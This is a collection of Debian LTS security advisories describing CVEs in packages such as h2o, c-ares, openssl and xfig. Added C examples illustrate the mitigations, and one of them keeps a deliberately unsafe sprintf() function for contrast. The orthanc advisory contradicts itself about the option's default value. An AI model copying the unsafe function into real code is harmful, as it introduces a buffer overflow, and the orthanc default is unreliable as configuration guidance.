[SECURITY] [DLA 3638-1] h2o security update
-------------------------------------------------------------------------
Debian LTS Advisory DLA-3638-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                        Anton Gladky
October 29, 2023                              https://wiki.debian.org/LTS
-------------------------------------------------------------------------

Package        : h2o
Version        : 2.2.5+dfsg2-2+deb10u2
CVE ID         : CVE-2023-44487
Debian Bug     : 1054232

A vulnerability has been identified in h2o, a high-performance web server
with support for HTTP/2. A security vulnerability CVE-2023-44487 was
discovered that could potentially be exploited to disrupt server
operation.

The vulnerability in the h2o HTTP/2 server was related to the handling of
certain types of HTTP/2 requests. In certain scenarios, an attacker could
send a series of malicious requests, causing the server to process them
rapidly and exhaust system resources.

The applied upstream patch changes the ABI. Therefore, if your application
is built against any shared libraries of h2o, you need to rebuild it.
No Debian package is affected.

For Debian 10 buster, this problem has been fixed in version
2.2.5+dfsg2-2+deb10u2.

We recommend that you upgrade your h2o packages.

For the detailed security status of h2o please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/h2o

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
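The advisory describes rapid streams of requests that exhaust the server. The usual server-side mitigation for CVE-2023-44487 is a per-connection budget of client stream resets; the following is an added illustration of that pattern, not h2o's code or the Debian patch, and the structure, function names and the 100-resets-per-second threshold are assumptions.

```c
/* Added example (not h2o code): a per-connection rate limiter for HTTP/2
 * RST_STREAM frames, the mitigation pattern servers adopted against
 * CVE-2023-44487. Names, fields and thresholds are assumptions. */
#include <stdint.h>
#include <stdio.h>

/* Tunables (assumed values): allow at most RST_LIMIT client-initiated
 * resets per RST_WINDOW_MS on one connection before it is torn down. */
#define RST_LIMIT     100
#define RST_WINDOW_MS 1000

struct h2_conn {
    uint64_t window_start_ms;  /* start of the current counting window */
    uint32_t resets_in_window; /* RST_STREAM frames seen in that window */
    uint32_t open_streams;     /* streams the peer opened and not yet closed */
    int      closed;           /* 1 once the connection was torn down */
};

/* Call when the client opens a new stream (HEADERS with a fresh id). */
static void h2_on_headers(struct h2_conn *c)
{
    c->open_streams++;
}

/* Call when the client cancels a stream it opened (RST_STREAM).
 * Returns 1 if the connection should be closed (GOAWAY, then close),
 * 0 if processing may continue. A fixed window anchored at the first
 * reset is used; a sliding window would be stricter, but this already
 * bounds the work an attacker can force per second per connection. */
static int h2_on_rst_stream(struct h2_conn *c, uint64_t now_ms)
{
    if (c->closed)
        return 1;
    if (c->open_streams > 0)
        c->open_streams--;
    if (now_ms - c->window_start_ms >= RST_WINDOW_MS) {
        c->window_start_ms = now_ms;   /* start a new counting window */
        c->resets_in_window = 0;
    }
    c->resets_in_window++;
    if (c->resets_in_window > RST_LIMIT) {
        c->closed = 1;   /* caller emits GOAWAY(ENHANCE_YOUR_CALM) and closes */
        return 1;
    }
    return 0;
}

/* Simulation on a fresh connection: n open-then-reset cycles spaced
 * gap_ms apart, starting at t = 0. Returns how many cycles were processed
 * before the limiter closed the connection (n if it survived). */
static int simulate_resets(int n, uint64_t gap_ms)
{
    struct h2_conn c = {0};
    uint64_t t = 0;
    for (int i = 0; i < n; i++, t += gap_ms) {
        h2_on_headers(&c);
        if (h2_on_rst_stream(&c, t))
            return i;
    }
    return n;
}

int main(void)
{
    /* Constructed scenarios: a 1 ms reset storm and a client that resets
     * 50 streams per second (e.g. a browser cancelling fetches). */
    printf("reset every 1 ms: connection closed after %d cycles\n",
           simulate_resets(1000, 1));
    printf("reset every 20 ms: survived %d of 1000 cycles\n",
           simulate_resets(1000, 20));
    return 0;
}
```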
[SECURITY] [DLA 3567-1] c-ares security update
-------------------------------------------------------------------------
Debian LTS Advisory DLA-3567-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                        Anton Gladky
September 15, 2023                            https://wiki.debian.org/LTS
-------------------------------------------------------------------------

Package        : c-ares
Version        : 1.14.0-1+deb10u4
CVE ID         : CVE-2020-22217

A vulnerability has been identified in c-ares, an asynchronous name
resolver library:

CVE-2020-22217

    A buffer overflow vulnerability has been found in c-ares, in the
    function ares_parse_soa_reply in ares_parse_soa_reply.c. This
    vulnerability was discovered through fuzzing. Exploitation of this
    vulnerability may allow an attacker to execute arbitrary code or
    cause a denial of service condition.

For Debian 10 buster, this problem has been fixed in version
1.14.0-1+deb10u4.

We recommend that you upgrade your c-ares packages.

For the detailed security status of c-ares please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/c-ares

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
[SECURITY] [DLA 3562-1] orthanc security update
-------------------------------------------------------------------------
Debian LTS Advisory DLA-3562-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                        Anton Gladky
September 12, 2023                            https://wiki.debian.org/LTS
-------------------------------------------------------------------------

Package        : orthanc
Version        : 1.5.6+dfsg-1+deb10u1
CVE ID         : CVE-2023-33466
Debian Bug     : 1040597

A security vulnerability was identified in Orthanc, a DICOM server used
for medical imaging, whereby authenticated API users had the capability
to overwrite arbitrary files and, in certain configurations, execute
unauthorized code.

This update addresses the issue by backporting a safeguard mechanism: the
RestApiWriteToFileSystemEnabled option is now included, and it is set to
"true" by default in the /etc/orthanc/orthanc.json configuration file.
Should users wish to revert to the previous behavior, they can manually
set this option to "true" themselves.

For Debian 10 buster, this problem has been fixed in version
1.5.6+dfsg-1+deb10u1.

We recommend that you upgrade your orthanc packages.

For the detailed security status of orthanc please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/orthanc

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
[SECURITY] [DLA 3530-1] openssl security update
-------------------------------------------------------------------------
Debian LTS Advisory DLA-3530-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                        Anton Gladky
August 15, 2023                               https://wiki.debian.org/LTS
-------------------------------------------------------------------------

Package        : openssl
Version        : 1.1.1n-0+deb10u6
CVE ID         : CVE-2023-3446 CVE-2023-3817

Two vulnerabilities were discovered in openssl, a Secure Sockets Layer
toolkit:

CVE-2023-3446, CVE-2023-3817

    Excessively long DH key or parameter checks can cause significant
    delays in applications using the DH_check(), DH_check_ex(), or
    EVP_PKEY_param_check() functions, potentially leading to Denial of
    Service attacks when keys or parameters are obtained from untrusted
    sources.

For Debian 10 buster, these problems have been fixed in version
1.1.1n-0+deb10u6.

We recommend that you upgrade your openssl packages.

For the detailed security status of openssl please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/openssl

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
[SECURITY] [DLA 3471-1] c-ares security update
-------------------------------------------------------------------------
Debian LTS Advisory DLA-3471-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                        Anton Gladky
June 26, 2023                                 https://wiki.debian.org/LTS
-------------------------------------------------------------------------

Package        : c-ares
Version        : 1.14.0-1+deb10u3
CVE ID         : CVE-2023-31130 CVE-2023-32067

Two vulnerabilities were discovered in c-ares, an asynchronous name
resolver library:

CVE-2023-31130

    ares_inet_net_pton() is found to be vulnerable to a buffer underflow
    for certain ipv6 addresses; in particular "0::00:00:00/2" was found
    to cause an issue. c-ares only uses this function internally for
    configuration purposes; however, external usage for other purposes
    may cause more severe issues.

CVE-2023-32067

    The target resolver may erroneously interpret a malformed UDP packet
    with a length of 0 as a graceful shutdown of the connection, which
    could cause a denial of service.

For Debian 10 buster, these problems have been fixed in version
1.14.0-1+deb10u3.

We recommend that you upgrade your c-ares packages.

For the detailed security status of c-ares please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/c-ares

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
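CVE-2023-32067 above comes down to one question a resolver's read loop must answer correctly: what does a zero-byte read mean? Over TCP it is end-of-stream; over UDP it is merely an empty datagram and the socket is still usable. The following added example (not c-ares code; the enum, function names and the constructed read sequence are assumptions) shows a read handler that keeps the two apart.

```c
/* Added example (not c-ares code): classify the result of recv()/recvfrom()
 * on a resolver socket so that an empty UDP datagram is skipped rather
 * than treated as a closed connection (the mistake behind CVE-2023-32067).
 * Names are assumptions. */
#include <errno.h>
#include <stdio.h>
#include <sys/types.h>

enum read_action {
    READ_PARSE,   /* n > 0: hand the bytes to the DNS message parser */
    READ_IGNORE,  /* UDP, n == 0: empty datagram, keep waiting on the socket */
    READ_AGAIN,   /* EAGAIN/EWOULDBLOCK/EINTR: nothing ready, try later */
    READ_CLOSE    /* TCP end-of-stream or a hard socket error: drop transport */
};

/* `n` is the return value of the read call, `err` the errno captured
 * immediately afterwards (only consulted when n < 0). */
static enum read_action classify_read(int is_tcp, ssize_t n, int err)
{
    if (n > 0)
        return READ_PARSE;
    if (n == 0) {
        /* Over TCP a zero-length read means the peer closed the stream.
         * Over UDP the kernel returns 0 for an empty datagram: the socket
         * is still open, and an unsolicited empty packet must not cost us
         * the server. */
        return is_tcp ? READ_CLOSE : READ_IGNORE;
    }
    if (err == EAGAIN || err == EWOULDBLOCK || err == EINTR)
        return READ_AGAIN;
    return READ_CLOSE;
}

/* One simulated read result: what recv() returned and the errno after it. */
struct sim_read {
    ssize_t n;
    int err;
};

/* Feed a constructed sequence of read results through classify_read() and
 * return how many messages reached the parser before the transport was
 * dropped (all of them if it never was). */
static int run_reads(int is_tcp, const struct sim_read *seq, int len)
{
    int parsed = 0;
    for (int i = 0; i < len; i++) {
        switch (classify_read(is_tcp, seq[i].n, seq[i].err)) {
        case READ_PARSE:
            parsed++;
            break;
        case READ_IGNORE:
        case READ_AGAIN:
            break;
        case READ_CLOSE:
            return parsed;
        }
    }
    return parsed;
}

/* Constructed scenario: a 64-byte reply, an empty packet, a would-block
 * read, then a 48-byte reply. A UDP transport should parse both replies;
 * a TCP transport correctly stops at the end-of-stream. */
static const struct sim_read kScenario[] = {
    { 64, 0 }, { 0, 0 }, { -1, EAGAIN }, { 48, 0 }
};
#define SCENARIO_LEN ((int)(sizeof kScenario / sizeof kScenario[0]))

static int udp_parsed(void) { return run_reads(0, kScenario, SCENARIO_LEN); }
static int tcp_parsed(void) { return run_reads(1, kScenario, SCENARIO_LEN); }

int main(void)
{
    printf("UDP: %d replies parsed (expected 2)\n", udp_parsed());
    printf("TCP: %d replies parsed before EOF (expected 1)\n", tcp_parsed());
    return 0;
}
```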
[SECURITY] [DLA 3399-1] 389-ds-base security update
-------------------------------------------------------------------------
Debian LTS Advisory DLA-3399-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                        Anton Gladky
April 24, 2023                                https://wiki.debian.org/LTS
-------------------------------------------------------------------------

Package        : 389-ds-base
Version        : 1.4.0.21-1+deb10u1
CVE ID         : CVE-2019-3883 CVE-2019-10224 CVE-2019-14824 CVE-2021-3514
                 CVE-2021-3652 CVE-2021-4091 CVE-2022-0918 CVE-2022-0996
                 CVE-2022-2850

Multiple security issues were discovered in 389-ds-base, an open source
LDAP server for Linux.

CVE-2019-3883

    SSL/TLS requests do not enforce the ioblocktimeout limit, leading to
    a DoS vulnerability by hanging all workers with hanging LDAP
    requests.

CVE-2019-10224

    The vulnerability may disclose sensitive information, such as the
    Directory Manager password, when the dscreate and dsconf commands
    are executed in verbose mode. An attacker who can view the screen or
    capture the terminal standard error output can exploit this
    vulnerability to obtain confidential information.

CVE-2019-14824

    The 'deref' plugin of 389-ds-base has a vulnerability that enables it
    to disclose attribute values using the 'search' permission. In
    certain setups, an authenticated attacker can exploit this flaw to
    access confidential attributes, including password hashes.

CVE-2021-3514

    If a sync_repl client is used, an authenticated attacker can trigger
    a crash by exploiting a specially crafted query that leads to a NULL
    pointer dereference.

CVE-2021-3652

    Importing an asterisk as a password hash enables successful
    authentication with any password, allowing attackers to access
    accounts with disabled passwords.

CVE-2021-4091

    A double free was found in the way 389-ds-base handles the virtual
    attributes context in persistent searches. An attacker could send a
    series of search requests, forcing the server to behave unexpectedly
    and crash.

CVE-2022-0918

    An unauthenticated attacker with network access to the LDAP port can
    cause a denial of service. The denial of service is triggered by a
    single message sent over a TCP connection; no bind or other
    authentication is required. The message triggers a segmentation
    fault that results in slapd crashing.

CVE-2022-0996

    An expired password was still allowed to access the database. A user
    whose password was expired was still allowed to access the database
    as if the password was not expired. Once a password is expired, and
    "grace logins" have been used up, the account is basically supposed
    to be locked out and should not be allowed to perform any privileged
    action.

CVE-2022-2850

    A vulnerability in the content synchronization plugin enables an
    authenticated attacker to trigger a denial of service via a crafted
    query through a NULL pointer dereference.

For Debian 10 buster, these problems have been fixed in version
1.4.0.21-1+deb10u1.

We recommend that you upgrade your 389-ds-base packages.

For the detailed security status of 389-ds-base please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/389-ds-base

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
[SECURITY] [DLA 3376-1] svgpp security update
-------------------------------------------------------------------------
Debian LTS Advisory DLA-3376-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                        Anton Gladky
March 31, 2023                                https://wiki.debian.org/LTS
-------------------------------------------------------------------------

Package        : svgpp
Version        : 1.2.3+dfsg1-6+deb10u1
CVE ID         : CVE-2019-6245 CVE-2019-6247 CVE-2021-44960

Multiple security issues were discovered in svgpp, a C++ library for
parsing and rendering Scalable Vector Graphics (SVG) files.

CVE-2021-44960

    The XMLDocument::getRoot function in the renderDocument function
    handled the XMLDocument object improperly. Specifically, it returned
    a null pointer prematurely at the second if statement, resulting in
    a null pointer reference behind the renderDocument function.

CVE-2019-6245 and CVE-2019-6247

    Issues were discovered in Anti-Grain Geometry (AGG) within the
    function agg::cell_aa::not_equal. Since svgpp is a header-only
    library, the issue is only transitive in theory. As a result, only a
    dependency version hardening has been added to the control file.

For Debian 10 buster, these problems have been fixed in version
1.2.3+dfsg1-6+deb10u1.

We recommend that you upgrade your svgpp packages.

For the detailed security status of svgpp please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/svgpp

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
[SECURITY] [DLA 3353-1] xfig security update
-------------------------------------------------------------------------
Debian LTS Advisory DLA-3353-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                        Anton Gladky
March 05, 2023                                https://wiki.debian.org/LTS
-------------------------------------------------------------------------

Package        : xfig
Version        : 1:3.2.7a-3+deb10u1
CVE ID         : CVE-2021-40241
Debian Bug     : 992395

A security issue has been discovered in xfig, a diagramming tool for the
interactive generation of figures under X11.

CVE-2021-40241

    A potential buffer overflow exists in the file src/w_help.c at line
    55. Specifically, the length of the string returned by getenv("LANG")
    may become very long and cause a buffer overflow while executing the
    sprintf() function. This vulnerability could potentially allow an
    attacker to execute arbitrary code or cause a denial-of-service
    condition.

For Debian 10 buster, this problem has been fixed in version
1:3.2.7a-3+deb10u1.

We recommend that you upgrade your xfig packages.

For the detailed security status of xfig please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/xfig

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
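The bug class in CVE-2021-40241 is an environment value formatted into a fixed-size buffer with sprintf(), which has no notion of the buffer's size. The following added example (not xfig's code; the buffer size, path format and helper names are assumptions) places that shape beside a bounded version that detects truncation and validates the value before use.

```c
/* Added example (not xfig code): the unbounded sprintf() shape behind
 * CVE-2021-40241 next to a bounded, validated replacement. Buffer size,
 * format string and function names are assumptions. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PATH_BUF 128   /* assumed fixed buffer size */

/* Vulnerable shape: sprintf() cannot know how large `out` is, so a LANG
 * value longer than the remaining space writes past the end of the buffer. */
static void build_help_path_unsafe(char *out, const char *lang)
{
    sprintf(out, "/usr/share/xfig/help/%s/index.html", lang);
}

/* Hardened: snprintf() bounds the write and returns the length the full
 * string would have had, so truncation is detected instead of silent.
 * Returns 0 on success, -1 if the path would not fit. */
static int build_help_path(char *out, size_t outlen, const char *lang)
{
    int n = snprintf(out, outlen, "/usr/share/xfig/help/%s/index.html", lang);
    if (n < 0 || (size_t)n >= outlen) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Environment variables are input: whoever launches the program controls
 * them. Accept only a short, locale-tag-shaped value (letters, digits and
 * "_.-@"), which also keeps "/" and ".." out of the resulting path. */
static int lang_is_sane(const char *lang)
{
    size_t len = strlen(lang);
    if (len == 0 || len > 32)
        return 0;
    for (size_t i = 0; i < len; i++) {
        char ch = lang[i];
        if (!((ch >= 'a' && ch <= 'z') || (ch >= 'A' && ch <= 'Z') ||
              (ch >= '0' && ch <= '9') || ch == '_' || ch == '.' ||
              ch == '-' || ch == '@'))
            return 0;
    }
    return 1;
}

/* Build the help path from a LANG value; falls back to "C" when the value
 * is missing or rejected. Returns 0 on success, -1 if it still did not fit. */
static int help_path_from_lang(const char *lang, char *out, size_t outlen)
{
    if (lang == NULL || !lang_is_sane(lang))
        lang = "C";
    return build_help_path(out, outlen, lang);
}

/* Test helpers: run the bounded builders into a PATH_BUF-byte buffer. */
static int try_build(const char *lang, size_t outlen)
{
    char buf[PATH_BUF];
    if (outlen > sizeof buf)
        outlen = sizeof buf;
    return build_help_path(buf, outlen, lang);
}

static int try_lang(const char *lang)
{
    char buf[PATH_BUF];
    return help_path_from_lang(lang, buf, sizeof buf);
}

/* A constructed LANG made of n copies of ch (n < 256). */
static int try_build_repeated(char ch, size_t n, size_t outlen)
{
    char lang[256];
    if (n >= sizeof lang)
        n = sizeof lang - 1;
    memset(lang, ch, n);
    lang[n] = '\0';
    return try_build(lang, outlen);
}

int main(void)
{
    char buf[PATH_BUF];
    build_help_path_unsafe(buf, "C");   /* safe only because "C" is short */
    printf("unsafe builder with short value: %s\n", buf);
    printf("LANG from environment accepted: %s\n",
           help_path_from_lang(getenv("LANG"), buf, sizeof buf) == 0 ? buf
                                                                      : "(rejected)");
    printf("200-byte LANG into %d-byte buffer: %d (expected -1)\n",
           PATH_BUF, try_build_repeated('A', 200, PATH_BUF));
    return 0;
}
```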
[SECURITY] [DLA 3122-1] dovecot security update
-------------------------------------------------------------------------
Debian LTS Advisory DLA-3122-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                        Anton Gladky
September 27, 2022                            https://wiki.debian.org/LTS
-------------------------------------------------------------------------

Package        : dovecot
Version        : 1:2.3.4.1-5+deb10u7
CVE ID         : CVE-2021-33515 CVE-2022-30550

Two security issues were discovered in dovecot, an IMAP and POP3 email
server.

CVE-2021-33515

    The submission service in Dovecot before 2.3.15 allows STARTTLS
    command injection in lib-smtp. Sensitive information can be
    redirected to an attacker-controlled address.

CVE-2022-30550

    When two passdb configuration entries exist with the same driver and
    args settings, incorrectly applied settings can lead to an unintended
    security configuration and can permit privilege escalation in
    certain configurations.

For Debian 10 buster, these problems have been fixed in version
1:2.3.4.1-5+deb10u7.

We recommend that you upgrade your dovecot packages.

For the detailed security status of dovecot please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/dovecot

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
[SECURITY] [DLA 3097-1] thunderbird security update
-------------------------------------------------------------------------
Debian LTS Advisory DLA-3097-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                        Anton Gladky
September 04, 2022                            https://wiki.debian.org/LTS
-------------------------------------------------------------------------

Package        : thunderbird
Version        : 1:91.13.0-1~deb10u1
CVE ID         : CVE-2022-38472 CVE-2022-38473 CVE-2022-38478

Multiple security issues were discovered in Thunderbird, which could
result in denial of service or the execution of arbitrary code.

For Debian 10 buster, these problems have been fixed in version
1:91.13.0-1~deb10u1.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
[SECURITY] [DLA 3087-1] webkit2gtk security update
-------------------------------------------------------------------------
Debian LTS Advisory DLA-3087-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                        Anton Gladky
August 30, 2022                               https://wiki.debian.org/LTS
-------------------------------------------------------------------------

Package        : webkit2gtk
Version        : 2.36.7-1~deb10u1
CVE ID         : CVE-2022-32893

The following vulnerabilities have been discovered in the WebKitGTK web
engine:

CVE-2022-32893

    An anonymous researcher discovered that processing maliciously
    crafted web content may lead to arbitrary code execution. Apple is
    aware of a report that this issue may have been actively exploited.

For Debian 10 buster, this problem has been fixed in version
2.36.7-1~deb10u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
[SECURITY] [DLA 3084-1] ndpi security update
-------------------------------------------------------------------------
Debian LTS Advisory DLA-3084-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                        Anton Gladky
August 27, 2022                               https://wiki.debian.org/LTS
-------------------------------------------------------------------------

Package        : ndpi
Version        : 2.6-3+deb10u1
CVE ID         : CVE-2020-15472 CVE-2020-15476

Two security issues have been discovered in ndpi, a deep packet
inspection library.

CVE-2020-15472

    The H.323 dissector is vulnerable to a heap-based buffer over-read in
    ndpi_search_h323 in lib/protocols/h323.c.

CVE-2020-15476

    The Oracle protocol dissector has a heap-based buffer over-read in
    ndpi_search_oracle.

For Debian 10 buster, these problems have been fixed in version
2.6-3+deb10u1.

We recommend that you upgrade your ndpi packages.

For the detailed security status of ndpi please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/ndpi

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
[SECURITY] [DLA 3080-1] firefox-esr security update
-------------------------------------------------------------------------
Debian LTS Advisory DLA-3080-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                        Anton Gladky
August 24, 2022                               https://wiki.debian.org/LTS
-------------------------------------------------------------------------

Package        : firefox-esr
Version        : 91.13.0esr-1~deb10u1
CVE ID         : CVE-2022-38472 CVE-2022-38473 CVE-2022-38478
Debian Bug     :

Multiple security issues have been found in the Mozilla Firefox web
browser, which could potentially result in the execution of arbitrary
code or spoofing.

For Debian 10 buster, these problems have been fixed in version
91.13.0esr-1~deb10u1.

We recommend that you upgrade your firefox-esr packages.

For the detailed security status of firefox-esr please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/firefox-esr

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
[SECURITY] [DLA 3019-1] admesh security update
-------------------------------------------------------------------------
Debian LTS Advisory DLA-3019-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                        Anton Gladky
May 22, 2022                                  https://wiki.debian.org/LTS
-------------------------------------------------------------------------

Package        : admesh
Version        : 0.98.2-3+deb9u1
CVE ID         : CVE-2018-25033
Debian Bug     : 1010770

One security issue has been found in admesh, a tool for processing
triangulated solid meshes.

CVE-2018-25033

    A heap-based buffer over-read in stl_update_connects_remove_1 (called
    from stl_remove_degenerate) in connect.c was detected, which might
    lead to memory corruption and other potential consequences.

For Debian 9 stretch, this problem has been fixed in version
0.98.2-3+deb9u1.

We recommend that you upgrade your admesh packages.

For the detailed security status of admesh please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/admesh

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
[SECURITY] [DLA 2983-1] abcm2ps security update
-------------------------------------------------------------------------
Debian LTS Advisory DLA-2983-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                        Anton Gladky
April 16, 2022                                https://wiki.debian.org/LTS
-------------------------------------------------------------------------

Package        : abcm2ps
Version        : 7.8.9-1+deb9u1
CVE ID         : CVE-2018-10753 CVE-2018-10771 CVE-2019-1010069
                 CVE-2021-32434 CVE-2021-32435 CVE-2021-32436

Multiple vulnerabilities have been discovered in abcm2ps, a program which
translates ABC music description files to PostScript.

CVE-2018-10753

    Stack-based buffer overflow in the delayed_output function in music.c
    allows remote attackers to cause a denial of service (application
    crash) or possibly have unspecified other impact.

CVE-2018-10771

    Stack-based buffer overflow in the get_key function in parse.c allows
    remote attackers to cause a denial of service (application crash) or
    possibly have unspecified other impact.

CVE-2019-1010069

    Incorrect access control allows attackers to cause a denial of
    service via a crafted file.

CVE-2021-32434

    Array overflow when a wrong duration occurs in a voice overlay.

CVE-2021-32435

    Stack-based buffer overflow in the function get_key in parse.c allows
    remote attackers to cause a denial of service (DoS) via unspecified
    vectors.

CVE-2021-32436

    Out-of-bounds read in the function write_title() in subs.c allows
    remote attackers to cause a denial of service via unspecified
    vectors.

For Debian 9 stretch, these problems have been fixed in version
7.8.9-1+deb9u1.

We recommend that you upgrade your abcm2ps packages.

For the detailed security status of abcm2ps please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/abcm2ps

Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
[SECURITY] [DLA 2975-1] openjpeg2 security update
Debian LTS Advisory DLA-2975-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                         Anton Gladky
April 10, 2022                                https://wiki.debian.org/LTS

Package        : openjpeg2
Version        : 2.1.2-1.1+deb9u7
CVE ID         : CVE-2020-27842 CVE-2020-27843 CVE-2021-29338 CVE-2022-1122

Multiple vulnerabilities have been discovered in openjpeg2, the open-source JPEG 2000 codec.

CVE-2020-27842

    Null pointer dereference through specially crafted input. The highest impact of this flaw is to application availability.

CVE-2020-27843

    The flaw allows an attacker to provide specially crafted input to the conversion or encoding functionality, causing an out-of-bounds read. The highest threat from this vulnerability is system availability.

CVE-2021-29338

    Integer overflow allows remote attackers to crash the application, causing a denial of service. This occurs when the attacker uses the command line option "-ImgDir" on a directory that contains 1048576 files.

CVE-2022-1122

    Input directory with a large number of files can lead to a segmentation fault and a denial of service due to a call of free() on an uninitialized pointer.

For Debian 9 stretch, these problems have been fixed in version 2.1.2-1.1+deb9u7.

We recommend that you upgrade your openjpeg2 packages.

For the detailed security status of openjpeg2 please refer to its security tracker page at: https://security-tracker.debian.org/tracker/openjpeg2
[SECURITY] [DLA 2972-1] libxml2 security update
Debian LTS Advisory DLA-2972-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                         Anton Gladky
April 08, 2022                                https://wiki.debian.org/LTS

Package        : libxml2
Version        : 2.9.4+dfsg1-2.2+deb9u6
CVE ID         : CVE-2016-9318 CVE-2017-5130 CVE-2017-5969 CVE-2017-16932
                 CVE-2022-23308

Five security issues have been discovered in libxml2, an XML C parser and toolkit.

CVE-2016-9318

    Vulnerable versions do not offer a flag directly indicating that the current document may be read but other files may not be opened, which makes it easier for remote attackers to conduct XML External Entity (XXE) attacks via a crafted document.

CVE-2017-5130

    Integer overflow in memory debug code allowed a remote attacker to potentially exploit heap corruption via a crafted XML file.

CVE-2017-5969

    Parser in recover mode allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted XML document.

CVE-2017-16932

    When expanding a parameter entity in a DTD, infinite recursion could lead to an infinite loop or memory exhaustion.

CVE-2022-23308

    An application that validates XML using xmlTextReaderRead() with XML_PARSE_DTDATTR and XML_PARSE_DTDVALID enabled becomes vulnerable to this use-after-free bug. This issue can result in denial of service.

For Debian 9 stretch, these problems have been fixed in version 2.9.4+dfsg1-2.2+deb9u6.

We recommend that you upgrade your libxml2 packages.

For the detailed security status of libxml2 please refer to its security tracker page at: https://security-tracker.debian.org/tracker/libxml2
[SECURITY] [DLA 2968-1] zlib security update
Debian LTS Advisory DLA-2968-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                         Anton Gladky
April 02, 2022                                https://wiki.debian.org/LTS

Package        : zlib
Version        : 1:1.2.8.dfsg-5+deb9u1
CVE ID         : CVE-2018-25032
Debian Bug     : 1008265

One security issue has been found in zlib, a compression library.

Danilo Ramos discovered that incorrect memory handling in zlib's deflate handling could result in denial of service or potentially the execution of arbitrary code if specially crafted input is processed.

For Debian 9 stretch, this problem has been fixed in version 1:1.2.8.dfsg-5+deb9u1.

We recommend that you upgrade your zlib packages.

For the detailed security status of zlib please refer to its security tracker page at: https://security-tracker.debian.org/tracker/zlib
[SECURITY] [UPDATE] [DLA 2948-1] debian-archive-keyring update
Debian LTS Advisory DLA-2948-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                         Anton Gladky
March 13, 2022                                https://wiki.debian.org/LTS

Package        : debian-archive-keyring
Version        : 2017.5+deb9u2

debian-archive-keyring is a package containing the GnuPG archive keys of the Debian archive. New GPG keys are constantly added with every new Debian release.

For Debian 9 stretch, the GPG keys for the Debian 11/bullseye release are added in version 2017.5+deb9u2.

We recommend that you upgrade your debian-archive-keyring packages only if you need to work with packages from the 11/bullseye release.
[SECURITY] [DLA 2937-1] gif2apng security update
Debian LTS Advisory DLA-2937-1                debian-...@lists.debian.org
https://www.debian.org/lts/security/                         Anton Gladky
March 07, 2022                                https://wiki.debian.org/LTS

Package        : gif2apng
Version        : 1.9+srconly-2+deb9u2
CVE ID         : CVE-2021-45909 CVE-2021-45910 CVE-2021-45911

Three issues have been discovered in gif2apng, a tool for converting animated GIF images to APNG format.

CVE-2021-45909

    Heap-based buffer overflow vulnerability in the DecodeLZW function. It allows an attacker to write a large amount of arbitrary data outside the boundaries of a buffer.

CVE-2021-45910

    Heap-based buffer overflow within the main function. It allows an attacker to write data outside of the allocated buffer.

CVE-2021-45911

    Heap-based buffer overflow in processing of delays in the main function.

For Debian 9 stretch, these problems have been fixed in version 1.9+srconly-2+deb9u2.

